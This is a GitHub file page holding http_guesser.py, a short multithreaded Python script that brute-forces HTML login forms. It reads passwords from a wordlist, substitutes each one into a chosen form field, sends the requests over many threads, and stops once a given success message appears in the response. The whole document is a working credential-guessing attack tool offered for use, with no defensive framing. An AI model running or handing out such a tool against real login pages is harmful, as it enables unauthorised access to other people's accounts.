-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathhttp_guesser.py
84 lines (68 loc) · 2.42 KB
/
http_guesser.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
import argparse, threading, queue, requests
from urllib.parse import urljoin, parse_qsl
argparse = argparse.ArgumentParser(description="A fast password guesser for HTML forms")
argparse.add_argument("-u", "--url", help="Enter the url of form action")
argparse.add_argument(
"-d",
"--data",
help="Enter the exact query string(in case of GET) and body data (in case of POST)",
)
argparse.add_argument("-m", "--method", help="Enter the form method (GET/POST)")
argparse.add_argument("-f", "--field", help="Enter the key name to be brute forced")
argparse.add_argument(
"-s", "--success", help="Enter the unique message in case of successful login"
)
argparse.add_argument("-t", "--threads", help="Enter the number of threads to run")
args = argparse.parse_args()
url = args.url
data = args.data
method = args.method
success_message = args.success
threads = int(args.threads)
field = args.field
s = requests.Session()
s.headers["User-agent"] = ""
if method == "POST":
s.headers["Content-type"] = "application/x-www-form-urlencoded"
try:
requests.get(url)
except:
print("[-] Could not connect to the url..")
exit()
guessed = False
correct_password = ""
def http_guesser():
global guessed, correct_password
while not guessed and not q.empty():
curr_pass = q.get()
try:
print(f"[:] Trying.. {curr_pass}")
pairs = data.split("&")
for j in range(len(pairs)):
if field in pairs[j]:
field_array = [field, curr_pass]
pairs[j] = "=".join(field_array)
data_new = "&".join(pairs)
res = s.request(method, url, data=data_new, timeout=3)
if success_message in res.content.decode().lower():
print(f"[+] Success message triggered on : {curr_pass}")
correct_password = curr_pass
guessed = True
except:
pass
q.task_done()
q = queue.Queue()
with open("wordlists/password_list", "r") as file:
for password in file.read().splitlines():
q.put(password)
threadsl = []
for i in range(threads):
t = threading.Thread(target=http_guesser, daemon=True)
t.start()
threadsl.append(t)
for t in threadsl:
t.join()
if guessed:
print(f"[+] Password found : {correct_password}")
else:
print("[-] Password not found..")